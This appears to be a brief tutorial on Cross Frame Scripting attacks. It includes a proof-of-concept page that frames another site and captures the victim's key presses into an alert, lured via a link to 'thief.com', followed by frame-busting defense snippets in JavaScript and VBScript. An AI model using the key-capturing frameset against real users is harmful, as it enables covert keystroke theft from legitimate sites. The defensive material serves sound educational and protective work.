An Example of an XFS Attack
XFS: Cross Frame Script attack.
What is an XFS attack? Here is an example:
Tom sends Jerry a message on QQ and tricks him into clicking the link below:
http://thief.com
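<html>
<head>
<title>IE Cross Frame Scripting Restriction Bypass Example</title>
<script>
// Reports every key code that the frameset's onkeypress handler receives.
function alertKey(e) {
  alert("key press = '" + e.which + "'");
}
</script>
</head>
<!-- The frameset keeps focus on itself (onload/onblur) and handles key presses while the framed site is displayed. -->
<frameset onload="this.focus();" onblur="this.focus();" cols="100%" onkeypress="alertKey(event);">
  <frame src="http://cuishen.iteye.com/" scrolling="auto">
</frameset>
</html>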
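<style>
  /* Hide the page until the script below confirms it is not framed. */
  html { visibility:hidden; }
</style>
<script>
  if (self == top) {
    // Top-level window: show the page.
    document.documentElement.style.visibility = 'visible';
  } else {
    // Loaded inside a frame: navigate the top window to this page.
    top.location = self.location;
  }
</script>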
if top <> self then
    if top.location.hostname <> self.location.hostname then
        top.location = "http://cuishen.iteye.com/"
    end if
end if